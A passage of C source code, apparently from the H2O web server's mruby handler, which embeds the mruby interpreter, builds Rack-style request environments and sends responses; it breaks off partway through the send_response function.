*/ #include <errno.h> #include <inttypes.h> #include <stdio.h> #include <stdlib.h> #include <mruby.h> #include <mruby/proc.h> #include <mruby/array.h> #include <mruby/class.h> #include <mruby/compile.h> #include <mruby/error.h> #include <mruby/hash.h> #include <mruby/opcode.h> #include <mruby/string.h> #include <mruby/throw.h> #include <mruby/variable.h> #include <mruby_input_stream.h> #include "h2o.h" #include "h2o/mruby_.h" #include "mruby/embedded.c.h" #define STATUS_FALLTHRU 399 #define FALLTHRU_SET_PREFIX "x-fallthru-set-" #define FREEZE_STRING(v) MRB_SET_FROZEN_FLAG(mrb_obj_ptr(v)) void h2o_mruby__abort_exc(mrb_state *mrb, const char *mess, const char *file, int line) { fprintf(stderr, "%s at file: \"%s\", line %d: %s\n", mess, file, line, RSTRING_PTR(mrb_inspect(mrb, mrb_obj_value(mrb->exc)))); abort(); } mrb_value h2o_mruby__new_str(mrb_state *mrb, const char *s, size_t len, const char *file, int line) { if (mrb->exc != NULL) h2o_mruby__abort_exc(mrb, "h2o_mruby_new_str:precondition failure", file, line); mrb_value ret = mrb_str_new(mrb, s, len); h2o_mruby_assert(mrb); return ret; } static void on_gc_dispose_generator(mrb_state *mrb, void *_generator) { h2o_mruby_generator_t *generator = _generator; if (generator == NULL) return; generator->refs.generator = mrb_nil_value(); } const static struct mrb_data_type generator_type = {"generator", on_gc_dispose_generator}; h2o_mruby_generator_t *h2o_mruby_get_generator(mrb_state *mrb, mrb_value obj) { h2o_mruby_generator_t *generator = mrb_data_check_get_ptr(mrb, obj, &generator_type); return generator; } void h2o_mruby_setup_globals(mrb_state *mrb) { const char *root = getenv("H2O_ROOT"); if (root == NULL) root = H2O_TO_STR(H2O_ROOT); mrb_gv_set(mrb, mrb_intern_lit(mrb, "$H2O_ROOT"), h2o_mruby_new_str(mrb, root, strlen(root))); h2o_mruby_eval_expr(mrb, "$LOAD_PATH << \"#{$H2O_ROOT}/share/h2o/mruby\""); h2o_mruby_assert(mrb); /* require core modules and include built-in libraries */ h2o_mruby_eval_expr(mrb, 
"require \"#{$H2O_ROOT}/share/h2o/mruby/preloads.rb\""); if (mrb->exc != NULL) { if (mrb_obj_is_instance_of(mrb, mrb_obj_value(mrb->exc), mrb_class_get(mrb, "LoadError"))) { fprintf(stderr, "file \"%s/%s\" not found. Did you forget to run `make install`?\n", root, "share/h2o/mruby/preloads.rb"); } else { fprintf(stderr, "an error occurred while loading %s/%s: %s\n", root, "share/h2o/mruby/preloads.rb", RSTRING_PTR(mrb_inspect(mrb, mrb_obj_value(mrb->exc)))); } abort(); } } mrb_value h2o_mruby_to_str(mrb_state *mrb, mrb_value v) { if (!mrb_string_p(v)) H2O_MRUBY_EXEC_GUARD({ v = mrb_str_to_str(mrb, v); }); return v; } mrb_value h2o_mruby_eval_expr(mrb_state *mrb, const char *expr) { return mrb_funcall(mrb, mrb_top_self(mrb), "eval", 1, mrb_str_new_cstr(mrb, expr)); } mrb_value h2o_mruby_eval_expr_location(mrb_state *mrb, const char *expr, const char *path, const int lineno) { return mrb_funcall(mrb, mrb_top_self(mrb), "eval", 4, mrb_str_new_cstr(mrb, expr), mrb_nil_value(), mrb_str_new_cstr(mrb, path), mrb_fixnum_value(lineno)); } void h2o_mruby_define_callback(mrb_state *mrb, const char *name, h2o_mruby_callback_t callback) { h2o_mruby_shared_context_t *shared_ctx = mrb->ud; h2o_vector_reserve(NULL, &shared_ctx->callbacks, shared_ctx->callbacks.size + 1); shared_ctx->callbacks.entries[shared_ctx->callbacks.size++] = callback; mrb_value args[2]; args[0] = mrb_str_new_cstr(mrb, name); args[1] = mrb_fixnum_value(-(int)shared_ctx->callbacks.size); mrb_funcall_argv(mrb, mrb_top_self(mrb), mrb_intern_lit(mrb, "_h2o_define_callback"), 2, args); if (mrb->exc != NULL) { fprintf(stderr, "failed to define mruby function: %s\n", name); h2o_mruby_assert(mrb); } } mrb_value h2o_mruby_create_data_instance(mrb_state *mrb, mrb_value class_obj, void *ptr, const mrb_data_type *type) { struct RClass *klass = mrb_class_ptr(class_obj); struct RData *data = mrb_data_object_alloc(mrb, klass, ptr, type); return mrb_obj_value(data); } struct RProc *h2o_mruby_compile_code(mrb_state *mrb, 
h2o_mruby_config_vars_t *config, char *errbuf) { mrbc_context *cxt; struct mrb_parser_state *parser; struct RProc *proc = NULL; /* parse */ if ((cxt = mrbc_context_new(mrb)) == NULL) { fprintf(stderr, "%s: no memory\n", H2O_MRUBY_MODULE_NAME); abort(); } if (config->path != NULL) mrbc_filename(mrb, cxt, config->path); cxt->capture_errors = 1; cxt->lineno = config->lineno; if ((parser = mrb_parse_nstring(mrb, config->source.base, (int)config->source.len, cxt)) == NULL) { fprintf(stderr, "%s: no memory\n", H2O_MRUBY_MODULE_NAME); abort(); } /* return erro if errbuf is supplied, or abort */ if (parser->nerr != 0) { if (errbuf == NULL) { fprintf(stderr, "%s: internal error (unexpected state)\n", H2O_MRUBY_MODULE_NAME); abort(); } snprintf(errbuf, 256, "line %d:%s", parser->error_buffer[0].lineno, parser->error_buffer[0].message); strcat(errbuf, "\n\n"); if (h2o_str_at_position(errbuf + strlen(errbuf), config->source.base, config->source.len, parser->error_buffer[0].lineno - config->lineno + 1, parser->error_buffer[0].column) != 0) { /* remove trailing "\n\n" in case we failed to append the source code at the error location */ errbuf[strlen(errbuf) - 2] = '\0'; } goto Exit; } /* generate code */ if ((proc = mrb_generate_code(mrb, parser)) == NULL) { fprintf(stderr, "%s: internal error (mrb_generate_code failed)\n", H2O_MRUBY_MODULE_NAME); abort(); } Exit: mrb_parser_free(parser); mrbc_context_free(mrb, cxt); return proc; } static h2o_iovec_t convert_header_name_to_env(h2o_mem_pool_t *pool, const char *name, size_t len) { #define KEY_PREFIX "HTTP_" #define KEY_PREFIX_LEN (sizeof(KEY_PREFIX) - 1) h2o_iovec_t ret; ret.len = len + KEY_PREFIX_LEN; ret.base = h2o_mem_alloc_pool(pool, ret.len); memcpy(ret.base, KEY_PREFIX, KEY_PREFIX_LEN); char *d = ret.base + KEY_PREFIX_LEN; for (; len != 0; ++name, --len) *d++ = *name == '-' ? 
'_' : h2o_toupper(*name); return ret; #undef KEY_PREFIX #undef KEY_PREFIX_LEN } static mrb_value build_constants(mrb_state *mrb, const char *server_name, size_t server_name_len) { mrb_value ary = mrb_ary_new_capa(mrb, H2O_MRUBY_NUM_CONSTANTS); mrb_int i; int gc_arena = mrb_gc_arena_save(mrb); { h2o_mem_pool_t pool; h2o_mem_init_pool(&pool); for (i = 0; i != H2O_MAX_TOKENS; ++i) { const h2o_token_t *token = h2o__tokens + i; mrb_value lit = mrb_nil_value(); if (token == H2O_TOKEN_CONTENT_TYPE) { lit = mrb_str_new_lit(mrb, "CONTENT_TYPE"); } else if (token->buf.len != 0) { h2o_iovec_t n = convert_header_name_to_env(&pool, token->buf.base, token->buf.len); lit = h2o_mruby_new_str(mrb, n.base, n.len); } if (mrb_string_p(lit)) { FREEZE_STRING(lit); mrb_ary_set(mrb, ary, i, lit); } } h2o_mem_clear_pool(&pool); } #define SET_STRING(idx, value) \ do { \ mrb_value lit = (value); \ FREEZE_STRING(lit); \ mrb_ary_set(mrb, ary, idx, lit); \ } while (0) #define SET_LITERAL(idx, str) SET_STRING(idx, mrb_str_new_lit(mrb, str)) SET_LITERAL(H2O_MRUBY_LIT_REQUEST_METHOD, "REQUEST_METHOD"); SET_LITERAL(H2O_MRUBY_LIT_SCRIPT_NAME, "SCRIPT_NAME"); SET_LITERAL(H2O_MRUBY_LIT_PATH_INFO, "PATH_INFO"); SET_LITERAL(H2O_MRUBY_LIT_QUERY_STRING, "QUERY_STRING"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_NAME, "SERVER_NAME"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_ADDR, "SERVER_ADDR"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_PORT, "SERVER_PORT"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_PROTOCOL, "SERVER_PROTOCOL"); SET_LITERAL(H2O_MRUBY_LIT_CONTENT_LENGTH, "CONTENT_LENGTH"); SET_LITERAL(H2O_MRUBY_LIT_REMOTE_ADDR, "REMOTE_ADDR"); SET_LITERAL(H2O_MRUBY_LIT_REMOTE_PORT, "REMOTE_PORT"); SET_LITERAL(H2O_MRUBY_LIT_REMOTE_USER, "REMOTE_USER"); SET_LITERAL(H2O_MRUBY_LIT_RACK_URL_SCHEME, "rack.url_scheme"); SET_LITERAL(H2O_MRUBY_LIT_RACK_MULTITHREAD, "rack.multithread"); SET_LITERAL(H2O_MRUBY_LIT_RACK_MULTIPROCESS, "rack.multiprocess"); SET_LITERAL(H2O_MRUBY_LIT_RACK_RUN_ONCE, "rack.run_once"); SET_LITERAL(H2O_MRUBY_LIT_RACK_HIJACK_, 
"rack.hijack?"); SET_LITERAL(H2O_MRUBY_LIT_RACK_INPUT, "rack.input"); SET_LITERAL(H2O_MRUBY_LIT_RACK_ERRORS, "rack.errors"); SET_LITERAL(H2O_MRUBY_LIT_SERVER_SOFTWARE, "SERVER_SOFTWARE"); SET_STRING(H2O_MRUBY_LIT_SERVER_SOFTWARE_VALUE, h2o_mruby_new_str(mrb, server_name, server_name_len)); #undef SET_LITERAL #undef SET_STRING h2o_mruby_eval_expr_location(mrb, H2O_MRUBY_CODE_CORE, "(h2o)lib/handler/mruby/embedded/core.rb", 1); h2o_mruby_assert(mrb); mrb_ary_set(mrb, ary, H2O_MRUBY_PROC_EACH_TO_ARRAY, mrb_funcall(mrb, mrb_obj_value(mrb->kernel_module), "_h2o_proc_each_to_array", 0)); h2o_mruby_assert(mrb); mrb_gc_arena_restore(mrb, gc_arena); return ary; } static void handle_exception(h2o_mruby_context_t *ctx, h2o_mruby_generator_t *generator) { mrb_state *mrb = ctx->shared->mrb; assert(mrb->exc != NULL); if (generator == NULL) { fprintf(stderr, "mruby raised: %s\n", RSTRING_PTR(mrb_inspect(mrb, mrb_obj_value(mrb->exc)))); } else { assert(generator->req != NULL); h2o_req_log_error(generator->req, H2O_MRUBY_MODULE_NAME, "mruby raised: %s\n", RSTRING_PTR(mrb_inspect(mrb, mrb_obj_value(mrb->exc)))); if (generator->req->_generator == NULL) { h2o_send_error_500(generator->req, "Internal Server Error", "Internal Server Error", 0); } else { h2o_mruby_send_chunked_close(generator); } } mrb->exc = NULL; } mrb_value send_error_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { mrb_state *mrb = ctx->shared->mrb; mrb->exc = mrb_obj_ptr(mrb_ary_entry(args, 0)); h2o_mruby_generator_t *generator = h2o_mruby_get_generator(mrb, mrb_ary_entry(args, 1)); handle_exception(ctx, generator); return mrb_nil_value(); } mrb_value block_request_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { mrb_state *mrb = ctx->shared->mrb; mrb_value blocking_req = mrb_ary_new_capa(mrb, 2); mrb_ary_set(mrb, blocking_req, 0, ctx->proc); mrb_ary_set(mrb, blocking_req, 1, input); mrb_ary_push(mrb, 
ctx->blocking_reqs, blocking_req); return mrb_nil_value(); } mrb_value run_blocking_requests_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { mrb_state *mrb = ctx->shared->mrb; mrb_value exc = mrb_ary_entry(args, 0); if (!mrb_nil_p(exc)) { mrb->exc = mrb_obj_ptr(exc); handle_exception(ctx, NULL); } mrb_int i; mrb_int len = RARRAY_LEN(ctx->blocking_reqs); for (i = 0; i != len; ++i) { mrb_value blocking_req = mrb_ary_entry(ctx->blocking_reqs, i); mrb_value blocking_req_resumer = mrb_ary_entry(blocking_req, 0); mrb_value blocking_req_input = mrb_ary_entry(blocking_req, 1); h2o_mruby_run_fiber(ctx, blocking_req_resumer, blocking_req_input, NULL); } mrb_ary_clear(mrb, ctx->blocking_reqs); return mrb_nil_value(); } mrb_value run_child_fiber_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { mrb_state *mrb = ctx->shared->mrb; mrb_value resumer = mrb_ary_entry(args, 0); /* * swap receiver to run child fiber immediately, while storing main fiber resumer * which will be called after the child fiber is yielded */ mrb_ary_push(mrb, ctx->resumers, *receiver); *receiver = resumer; *run_again = 1; return mrb_nil_value(); } mrb_value finish_child_fiber_callback(h2o_mruby_context_t *ctx, mrb_value input, mrb_value *receiver, mrb_value args, int *run_again) { /* do nothing */ return mrb_nil_value(); } static h2o_mruby_shared_context_t *create_shared_context(h2o_context_t *ctx) { /* init mruby in every thread */ h2o_mruby_shared_context_t *shared_ctx = h2o_mem_alloc(sizeof(*shared_ctx)); if ((shared_ctx->mrb = mrb_open()) == NULL) { fprintf(stderr, "%s: no memory\n", H2O_MRUBY_MODULE_NAME); abort(); } shared_ctx->mrb->ud = shared_ctx; shared_ctx->ctx = ctx; shared_ctx->current_context = NULL; shared_ctx->callbacks = (h2o_mruby_callbacks_t){NULL}; h2o_mruby_setup_globals(shared_ctx->mrb); shared_ctx->constants = build_constants(shared_ctx->mrb, 
ctx->globalconf->server_name.base, ctx->globalconf->server_name.len); shared_ctx->symbols.sym_call = mrb_intern_lit(shared_ctx->mrb, "call"); shared_ctx->symbols.sym_close = mrb_intern_lit(shared_ctx->mrb, "close"); shared_ctx->symbols.sym_method = mrb_intern_lit(shared_ctx->mrb, "method"); shared_ctx->symbols.sym_headers = mrb_intern_lit(shared_ctx->mrb, "headers"); shared_ctx->symbols.sym_body = mrb_intern_lit(shared_ctx->mrb, "body"); shared_ctx->symbols.sym_async = mrb_intern_lit(shared_ctx->mrb, "async"); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__send_error", send_error_callback); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__block_request", block_request_callback); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__run_blocking_requests", run_blocking_requests_callback); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__run_child_fiber", run_child_fiber_callback); h2o_mruby_define_callback(shared_ctx->mrb, "_h2o__finish_child_fiber", finish_child_fiber_callback); h2o_mruby_send_chunked_init_context(shared_ctx); h2o_mruby_http_request_init_context(shared_ctx); h2o_mruby_sleep_init_context(shared_ctx); h2o_mruby_channel_init_context(shared_ctx); struct RClass *module = mrb_define_module(shared_ctx->mrb, "H2O"); struct RClass *generator_klass = mrb_define_class_under(shared_ctx->mrb, module, "Generator", shared_ctx->mrb->object_class); mrb_ary_set(shared_ctx->mrb, shared_ctx->constants, H2O_MRUBY_GENERATOR_CLASS, mrb_obj_value(generator_klass)); return shared_ctx; } static void dispose_shared_context(void *data) { if (data == NULL) return; h2o_mruby_shared_context_t *shared_ctx = (h2o_mruby_shared_context_t *)data; mrb_close(shared_ctx->mrb); free(shared_ctx); } static h2o_mruby_shared_context_t *get_shared_context(h2o_context_t *ctx) { static size_t key = SIZE_MAX; void **data = h2o_context_get_storage(ctx, &key, dispose_shared_context); if (*data == NULL) { *data = create_shared_context(ctx); } return *data; } mrb_value 
prepare_fibers(h2o_mruby_context_t *ctx) { mrb_state *mrb = ctx->shared->mrb; h2o_mruby_config_vars_t config = ctx->handler->config; mrb_value conf = mrb_hash_new_capa(mrb, 3); mrb_hash_set(mrb, conf, mrb_symbol_value(mrb_intern_lit(mrb, "code")), h2o_mruby_new_str(mrb, config.source.base, config.source.len)); mrb_hash_set(mrb, conf, mrb_symbol_value(mrb_intern_lit(mrb, "file")), h2o_mruby_new_str(mrb, config.path, strlen(config.path))); mrb_hash_set(mrb, conf, mrb_symbol_value(mrb_intern_lit(mrb, "line")), mrb_fixnum_value(config.lineno)); /* run code and generate handler */ mrb_value result = mrb_funcall(mrb, mrb_obj_value(mrb->kernel_module), "_h2o_prepare_app", 1, conf); h2o_mruby_assert(mrb); assert(mrb_array_p(result)); return result; } static void on_context_init(h2o_handler_t *_handler, h2o_context_t *ctx) { h2o_mruby_handler_t *handler = (void *)_handler; h2o_mruby_context_t *handler_ctx = h2o_mem_alloc(sizeof(*handler_ctx)); handler_ctx->handler = handler; handler_ctx->shared = get_shared_context(ctx); mrb_state *mrb = handler_ctx->shared->mrb; handler_ctx->blocking_reqs = mrb_ary_new(mrb); handler_ctx->resumers = mrb_ary_new(mrb); /* compile code (must be done for each thread) */ int arena = mrb_gc_arena_save(mrb); mrb_value fibers = prepare_fibers(handler_ctx); assert(mrb_array_p(fibers)); handler_ctx->proc = mrb_ary_entry(fibers, 0); /* run configurator */ mrb_value configurator = mrb_ary_entry(fibers, 1); h2o_mruby_run_fiber(handler_ctx, configurator, mrb_nil_value(), NULL); h2o_mruby_assert(handler_ctx->shared->mrb); mrb_gc_arena_restore(mrb, arena); mrb_gc_protect(mrb, handler_ctx->proc); mrb_gc_protect(mrb, configurator); h2o_context_set_handler_context(ctx, &handler->super, handler_ctx); } static void on_context_dispose(h2o_handler_t *_handler, h2o_context_t *ctx) { h2o_mruby_handler_t *handler = (void *)_handler; h2o_mruby_context_t *handler_ctx = h2o_context_get_handler_context(ctx, &handler->super); if (handler_ctx == NULL) return; 
free(handler_ctx); } static void on_handler_dispose(h2o_handler_t *_handler) { h2o_mruby_handler_t *handler = (void *)_handler; free(handler->config.source.base); free(handler->config.path); free(handler); } static void stringify_address(h2o_conn_t *conn, socklen_t (*cb)(h2o_conn_t *conn, struct sockaddr *), mrb_state *mrb, mrb_value *host, mrb_value *port) { struct sockaddr_storage ss; socklen_t sslen; char buf[NI_MAXHOST]; *host = mrb_nil_value(); *port = mrb_nil_value(); if ((sslen = cb(conn, (void *)&ss)) == 0) return; size_t l = h2o_socket_getnumerichost((void *)&ss, sslen, buf); if (l != SIZE_MAX) *host = h2o_mruby_new_str(mrb, buf, l); int32_t p = h2o_socket_getport((void *)&ss); if (p != -1) { l = (int)sprintf(buf, "%" PRIu16, (uint16_t)p); *port = h2o_mruby_new_str(mrb, buf, l); } } static void on_rack_input_free(mrb_state *mrb, const char *base, mrb_int len, void *_input_stream) { /* reset ref to input_stream */ mrb_value *input_stream = _input_stream; *input_stream = mrb_nil_value(); } static int build_env_sort_header_cb(const void *_x, const void *_y) { const h2o_header_t *x = *(const h2o_header_t **)_x, *y = *(const h2o_header_t **)_y; if (x->name->len < y->name->len) return -1; if (x->name->len > y->name->len) return 1; if (x->name->base != y->name->base) { int r = memcmp(x->name->base, y->name->base, x->name->len); if (r != 0) return r; } assert(x != y); /* the order of the headers having the same name needs to be retained */ return x < y ? -1 : 1; } static mrb_value build_path_info(mrb_state *mrb, h2o_req_t *req, size_t confpath_len_wo_slash) { if (req->path_normalized.len == confpath_len_wo_slash) return mrb_str_new_lit(mrb, ""); assert(req->path_normalized.len > confpath_len_wo_slash); size_t path_info_start, path_info_end = req->query_at != SIZE_MAX ? 
req->query_at : req->path.len; if (req->norm_indexes == NULL) { path_info_start = confpath_len_wo_slash; } else if (req->norm_indexes[0] == 0 && confpath_len_wo_slash == 0) { /* path without leading slash */ path_info_start = 0; } else { path_info_start = req->norm_indexes[confpath_len_wo_slash] - 1; } return h2o_mruby_new_str(mrb, req->path.base + path_info_start, path_info_end - path_info_start); } static mrb_value build_env(h2o_mruby_generator_t *generator) { h2o_mruby_shared_context_t *shared = generator->ctx->shared; mrb_state *mrb = shared->mrb; mrb_value env = mrb_hash_new_capa(mrb, 16); char http_version[sizeof("HTTP/1.0")]; size_t http_version_sz; /* environment */ mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_REQUEST_METHOD), h2o_mruby_new_str(mrb, generator->req->method.base, generator->req->method.len)); size_t confpath_len_wo_slash = generator->req->pathconf->path.len; if (generator->req->pathconf->path.base[generator->req->pathconf->path.len - 1] == '/') --confpath_len_wo_slash; assert(confpath_len_wo_slash <= generator->req->path_normalized.len); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SCRIPT_NAME), h2o_mruby_new_str(mrb, generator->req->pathconf->path.base, confpath_len_wo_slash)); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_PATH_INFO), build_path_info(mrb, generator->req, confpath_len_wo_slash)); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_QUERY_STRING), generator->req->query_at != SIZE_MAX ? 
h2o_mruby_new_str(mrb, generator->req->path.base + generator->req->query_at + 1, generator->req->path.len - (generator->req->query_at + 1)) : mrb_str_new_lit(mrb, "")); mrb_hash_set( mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_NAME), h2o_mruby_new_str(mrb, generator->req->hostconf->authority.host.base, generator->req->hostconf->authority.host.len)); http_version_sz = h2o_stringify_protocol_version(http_version, generator->req->version); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_PROTOCOL), h2o_mruby_new_str(mrb, http_version, http_version_sz)); { mrb_value h, p; stringify_address(generator->req->conn, generator->req->conn->callbacks->get_sockname, mrb, &h, &p); if (!mrb_nil_p(h)) mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_ADDR), h); if (!mrb_nil_p(p)) mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_PORT), p); } mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_TOKEN_HOST - h2o__tokens), h2o_mruby_new_str(mrb, generator->req->authority.base, generator->req->authority.len)); if (generator->req->entity.base != NULL) { char buf[32]; int l = sprintf(buf, "%zu", generator->req->entity.len); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_CONTENT_LENGTH), h2o_mruby_new_str(mrb, buf, l)); generator->rack_input = mrb_input_stream_value(mrb, NULL, 0); mrb_input_stream_set_data(mrb, generator->rack_input, generator->req->entity.base, (mrb_int)generator->req->entity.len, 0, on_rack_input_free, &generator->rack_input); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_INPUT), generator->rack_input); } { mrb_value h, p; stringify_address(generator->req->conn, generator->req->conn->callbacks->get_peername, mrb, &h, &p); if (!mrb_nil_p(h)) mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_REMOTE_ADDR), h); if (!mrb_nil_p(p)) mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, 
H2O_MRUBY_LIT_REMOTE_PORT), p); } { size_t i; for (i = 0; i != generator->req->env.size; i += 2) { h2o_iovec_t *name = generator->req->env.entries + i, *value = name + 1; mrb_hash_set(mrb, env, h2o_mruby_new_str(mrb, name->base, name->len), h2o_mruby_new_str(mrb, value->base, value->len)); } } { /* headers */ h2o_header_t **sorted = alloca(sizeof(*sorted) * generator->req->headers.size); size_t i, num_sorted = 0; for (i = 0; i != generator->req->headers.size; ++i) { if (generator->req->headers.entries[i].name == &H2O_TOKEN_TRANSFER_ENCODING->buf) continue; sorted[num_sorted++] = generator->req->headers.entries + i; } qsort(sorted, num_sorted, sizeof(*sorted), build_env_sort_header_cb); h2o_iovec_t *values = alloca(sizeof(*values) * (num_sorted * 2 - 1)); for (i = 0; i != num_sorted; ++i) { /* build flattened value of the header field values that have the same name as sorted[i] */ size_t num_values = 0; values[num_values++] = sorted[i]->value; while (i < num_sorted - 1 && h2o_header_name_is_equal(sorted[i], sorted[i + 1])) { ++i; values[num_values++] = h2o_iovec_init(sorted[i]->name == &H2O_TOKEN_COOKIE->buf ? "; " : ", ", 2); values[num_values++] = sorted[i]->value; } h2o_iovec_t flattened_values = num_values == 1 ? values[0] : h2o_concat_list(&generator->req->pool, values, num_values); /* build mrb_values for name, header, and set them to the hash */ mrb_value n, v = h2o_mruby_new_str(mrb, flattened_values.base, flattened_values.len); if (h2o_iovec_is_token(sorted[i]->name)) { const h2o_token_t *token = H2O_STRUCT_FROM_MEMBER(h2o_token_t, buf, sorted[i]->name); n = mrb_ary_entry(shared->constants, (mrb_int)(token - h2o__tokens)); } else { h2o_iovec_t vec = convert_header_name_to_env(&generator->req->pool, sorted[i]->name->base, sorted[i]->name->len); n = h2o_mruby_new_str(mrb, vec.base, vec.len); } mrb_hash_set(mrb, env, n, v); } } /* rack.* */ /* TBD rack.version? 
*/ mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_URL_SCHEME), h2o_mruby_new_str(mrb, generator->req->scheme->name.base, generator->req->scheme->name.len)); /* we are using shared-none architecture, and therefore declare ourselves as multiprocess */ mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_MULTITHREAD), mrb_false_value()); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_MULTIPROCESS), mrb_true_value()); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_RUN_ONCE), mrb_false_value()); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_HIJACK_), mrb_false_value()); mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_RACK_ERRORS), mrb_gv_get(mrb, mrb_intern_lit(mrb, "$stderr"))); /* server name */ mrb_hash_set(mrb, env, mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_SOFTWARE), mrb_ary_entry(shared->constants, H2O_MRUBY_LIT_SERVER_SOFTWARE_VALUE)); return env; } static int handle_response_header(h2o_mruby_shared_context_t *shared_ctx, h2o_iovec_t name, h2o_iovec_t value, void *_req) { h2o_req_t *req = _req; const h2o_token_t *token; static const h2o_iovec_t fallthru_set_prefix = {H2O_STRLIT(FALLTHRU_SET_PREFIX)}; /* convert name to lowercase */ name = h2o_strdup(&req->pool, name.base, name.len); h2o_strtolower(name.base, name.len); if ((token = h2o_lookup_token(name.base, name.len)) != NULL) { if (token->proxy_should_drop_for_res) { /* skip */ } else if (token == H2O_TOKEN_CONTENT_LENGTH) { req->res.content_length = h2o_strtosize(value.base, value.len); } else { value = h2o_strdup(&req->pool, value.base, value.len); if (token == H2O_TOKEN_LINK) { h2o_iovec_t new_value = h2o_push_path_in_link_header(req, value.base, value.len); if (new_value.len) h2o_add_header(&req->pool, &req->res.headers, token, NULL, new_value.base, new_value.len); } else { h2o_add_header(&req->pool, &req->res.headers, token, NULL, 
value.base, value.len); } } } else if (name.len > fallthru_set_prefix.len && h2o_memis(name.base, fallthru_set_prefix.len, fallthru_set_prefix.base, fallthru_set_prefix.len)) { /* register environment variables (with the name converted to uppercase, and using `_`) */ size_t i; name.base += fallthru_set_prefix.len; name.len -= fallthru_set_prefix.len; for (i = 0; i != name.len; ++i) name.base[i] = name.base[i] == '-' ? '_' : h2o_toupper(name.base[i]); h2o_iovec_t *slot = h2o_req_getenv(req, name.base, name.len, 1); *slot = h2o_strdup(&req->pool, value.base, value.len); } else { value = h2o_strdup(&req->pool, value.base, value.len); h2o_add_header_by_str(&req->pool, &req->res.headers, name.base, name.len, 0, NULL, value.base, value.len); } return 0; } static void clear_rack_input(h2o_mruby_generator_t *generator) { if (!mrb_nil_p(generator->rack_input)) mrb_input_stream_set_data(generator->ctx->shared->mrb, generator->rack_input, NULL, -1, 0, NULL, NULL); } static void on_generator_dispose(void *_generator) { h2o_mruby_generator_t *generator = _generator; clear_rack_input(generator); generator->req = NULL; if (!mrb_nil_p(generator->refs.generator)) DATA_PTR(generator->refs.generator) = NULL; if (generator->chunked != NULL) h2o_mruby_send_chunked_dispose(generator); } static int on_req(h2o_handler_t *_handler, h2o_req_t *req) { h2o_mruby_handler_t *handler = (void *)_handler; h2o_mruby_shared_context_t *shared = get_shared_context(req->conn->ctx); int gc_arena = mrb_gc_arena_save(shared->mrb); h2o_mruby_context_t *ctx = h2o_context_get_handler_context(req->conn->ctx, &handler->super); h2o_mruby_generator_t *generator = h2o_mem_alloc_shared(&req->pool, sizeof(*generator), on_generator_dispose); generator->super.proceed = NULL; generator->super.stop = NULL; generator->req = req; generator->ctx = ctx; generator->rack_input = mrb_nil_value(); generator->chunked = NULL; mrb_value env = build_env(generator); mrb_value gen = h2o_mruby_create_data_instance(shared->mrb, 
mrb_ary_entry(shared->constants, H2O_MRUBY_GENERATOR_CLASS), generator, &generator_type); generator->refs.generator = gen; mrb_value args = mrb_ary_new(shared->mrb); mrb_ary_set(shared->mrb, args, 0, env); mrb_ary_set(shared->mrb, args, 1, gen); int is_delegate = 0; h2o_mruby_run_fiber(ctx, ctx->proc, args, &is_delegate); mrb_gc_arena_restore(shared->mrb, gc_arena); if (is_delegate) return -1; return 0; } static int send_response(h2o_mruby_generator_t *generator, mrb_int status, mrb_value resp, int *is_delegate) { mrb_state *mrb = generator->ctx->shared->mrb; mrb_value body; h2o_iovec_t content = {NULL}; /* set status */ generator->req->res.status = (int)status; /* set headers */ if (h2o_mruby_iterate_headers(generator->ctx->shared, mrb_ary_entry(resp, 1), handle_response_header, generator->req) != 0) { return -1; } /* add date: if it's missing from the response */ if (h2o_find_header(&generator->req->res.headers, H2O_TOKEN_DATE, 0) == -1) h2o_resp_add_date_header(generator->req); /* return without processing body, if status is fallthru */ if (generator->req->res.status == STATUS_FALLTHRU) { if (is_delegate != NULL) *is_delegate = 1; else h2o_delegate_request_deferred(generator->req, &generator->ctx->handler->super); return 0; } /* obtain body */ body = mrb_ary_entry(resp, 2); /* flatten body if possible */ if (mrb_array_p(body)) { mrb_int i, len = RARRAY_LEN(body); /* calculate the length of the output, while at the same time converting the elements of the output array to string */ content.len = 0; for (i = 0; i != len; ++i) { mrb_value e = mrb_ary_entry(body, i); if (!mrb_string_p(e)) { e = h2o_mruby_to_str(mrb, e); if (mrb->exc != NULL) return -1; 